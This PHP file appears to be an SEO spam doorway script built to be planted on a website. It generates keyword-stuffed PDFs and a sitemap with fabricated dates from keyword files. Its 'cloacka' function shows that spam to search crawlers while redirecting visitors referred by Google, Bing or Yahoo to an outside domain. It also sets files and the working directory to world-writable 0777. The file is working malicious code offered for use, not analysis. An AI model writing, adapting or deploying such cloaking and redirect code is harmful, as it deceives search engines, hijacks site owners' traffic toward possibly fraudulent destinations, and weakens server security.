<?php
header('Content-Type: text/html; charset=UTF-8');

$workdir = trim(strip_tags($_SERVER['SCRIPT_NAME']));
$workdir = str_ireplace('index.php', '', $workdir);
$workdir = str_ireplace('/', '/', $workdir);

$linkPart = trim($_SERVER['HTTP_HOST'] . $workdir);
$keysDirectory = getcwd() . '/keys/';

if (!empty($_GET['links']) && $_GET['links'] == 'link') {
    $html = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">';
    $html .= '<html xmlns="http://www.w3.org/1999/xhtml">';
    $html .= '<head>
				<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
				<title>LINKS</title>
			</head>
			<body>';
	echo $html;
	getAllKeys($keysDirectory, $linkPart);
	echo '</body></html>';
    exit;
}

$requestFile = trim(str_replace($workdir . 'index.php', '', $_SERVER['REQUEST_URI']));
if (strpos($requestFile, '?') !== false) {
    $requestFile = substr($requestFile, 0,  strpos($requestFile, '?'));
}

if ($requestFile == '/sitemap.xml') {
    getSiteMap($keysDirectory, $linkPart);
    exit;
}

if (substr($requestFile, -4) == '.pdf') {

    if (cloacka()) {
        $url = 'http://dellfacdeit.xyz/cvkyulbeuxnwlmz/?1b8zH&stream_id=pdf_01_1';
        header('Location: ' . $url, 301);
        exit;
    }

    if (!file_exists(getcwd().'/template.tpl')) {
        error();
    }

    $template = file_get_contents(getcwd() . '/template.tpl');

    $getFileName = explode('/', trim($requestFile));

    if (empty($getFileName)) {
        error();
    }

    $getFileName = array_filter($getFileName);

    if (count($getFileName) < 2) {
        error();
    }
    $getFileName = array_values($getFileName);

    $keyName = trim($getFileName[1]);
    $getFileName = trim($getFileName[0]);

    if (file_exists(getcwd() . '/files/' . $getFileName . '_' . $keyName)) {
        header("Content-type:application/pdf");
        echo file_get_contents(getcwd() . '/files/' . $getFileName . '_' . $keyName);
        exit;
    }

    if (!file_exists(getcwd() . '/keys/' . $getFileName . '.txt')) {
        error();
    }

    $title = ucwords(urldecode(str_ireplace('.pdf', '', $keyName)));
    $content = getRandomKeys($getFileName);
    $size = $content['count'];
    $content = $content['body'];

    $template = str_ireplace(array('{{title}}', '{{content}}'), array($title, $content), $template);

    header("Content-type:application/pdf");
    include (getcwd(). '/mpdf/mpdf.php');
    $mpdf = new mPDF('utf-8', array(190,100 + ($size * 5)));
    $mpdf->WriteHTML($template);
    $mpdf->Output(getcwd() . '/files/' . $getFileName . '_' . $keyName,'F');
    $mpdf->Output($keyName,'I');
    @chmod(getcwd() . '/files/' . $getFileName . '_' . $keyName, 0777);
    exit;
}

function getRandomKeys($file)
{
    $file = $file . '.txt';
    $lines = file(getcwd() . '/keys/' . $file);
    if ($lines == false) {
        error();
    }
    $totalLines = count($lines);
    if ($totalLines == false) {
        error();
    }

    $iteration = rand(200, 300);
    $content = array('body' => '', 'count' => $iteration);
    for ($i = 0; $i < $iteration;$i++) {
        $content['body'] .= '<span>' . $lines[array_rand($lines)] . '</span><br>';
    }

    return $content;
}

function getSiteMap($directory, $alias)
{
    header('Content-Type: text/xml; charset=UTF-8');
    if (file_exists(getcwd() . '/sitemap.xml')) {
        echo file_get_contents(getcwd() . '/sitemap.xml');
        return true;
    }

    $xml = '<?xml version="1.0" encoding="utf-8"?><urlset xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd" xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">';

    $files = scandir($directory);

    foreach ($files as $file) {
        if ($file != '.' && $file != '..' && substr($file, -4) == '.txt') {
            $keysHangle = @fopen($directory . $file, "r");
            $subCatalog = substr($file, 0, -4);
            if ($keysHangle) {
                while (($buffer = fgets($keysHangle)) !== false) {
                    $priority = '0.' . rand(6, 9);
                    $month = rand(1, 12);
                    $day = rand(1,28);
                    if ($month < 10) {
                        $month = '0' . $month;
                    }
                    if ($day < 10) {
                        $day = '0' . $day;
                    }
                    $date = rand(2012, 2016) . '-' . $month . '-' . $day;

                    $xml .= '<url>';
                    $xml .= '<loc>'.siteProtocol().$alias . 'index.php/' . $subCatalog . '/'.getKeyURL($buffer).'.pdf</loc>';
                    $xml .= '<lastmod>'.$date.'</lastmod><changefreq>always</changefreq><priority>'.$priority.'</priority></url>';
                }
                fclose($keysHangle);
            }
        }
    }
    $xml .= '</urlset>';

    if (!@file_put_contents(getcwd() . '/sitemap.xml', $xml)) {
        @chmod(getcwd(), 0777);
        @file_put_contents(getcwd() . '/sitemap.xml', $xml);
    }

    echo $xml;
}


function getAllKeys($directory, $alias)
{
    $files = scandir($directory);

    foreach ($files as $file) {
        if ($file != '.' && $file != '..' && substr($file, -4) == '.txt') {
            $keysHangle = @fopen($directory . $file, "r");
            $subCatalog = substr($file, 0, -4);
            if ($keysHangle) {
                while (($buffer = fgets($keysHangle)) !== false) {
                    echo '<a href="'.siteProtocol().$alias . 'index.php/' . $subCatalog . '/'.getKeyURL($buffer).'.pdf" style="display:block;">'.$buffer.'</a>';
                }
                fclose($keysHangle);
            }
        }
    }
}

function getKeyURL($key)
{
    return urlencode(trim($key));
}

function siteProtocol()
{
    $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443) ? "https://" : "http://";
    return $protocol;
}

function error()
{
    header('HTTP/1.1 404 Not Found');
    header('Status: 404 Not Found');
    exit;
}

function cloacka()
{
    $userAgentList = array(
        'majestic','bingbot','accoonabot','antabot','Baiduspider','curl','EltaIndexer','feedly','GameSpyHTTP','Gigabot',
        'google','grub-client','gsa-crawler','Gulper','ia_archiver','Jeeves/Teoma','Jigsaw','MihalismBot','sogou','exabot',
        'soso','MMCrawler','Msnbot','OmniExplorer_Bot','OoyyoBot','Pagebull','Project33','Scooter','Slurp','W3C_Validator',
        'WebAlta','Wget','Yahoo','YahooFeedSeeker','Yandex','TweetmemeBot');
    $referrerList = array('yahoo.', 'google.', 'bing.');

    if (empty($_SERVER['HTTP_REFERER'])) {
        return false;
    }
    $referrer = trim($_SERVER['HTTP_REFERER']);
    if (empty($_SERVER['HTTP_USER_AGENT'])) {
        return false;
    }
    $userAgent = trim($_SERVER['HTTP_USER_AGENT']);

    $cloacka = true;

    foreach ($userAgentList as $user) {
        if (stripos($userAgent, $user) !== false) {
            $cloacka = false;
            break;
        }
    }

    if ($cloacka == false) {
        return false;
    }

    $cloacka = false;
    foreach ($referrerList as $ref) {
        if (stripos($referrer, $ref) !== false) {
            $cloacka = true;
            break;
        }
    }

    return $cloacka;
}
exit;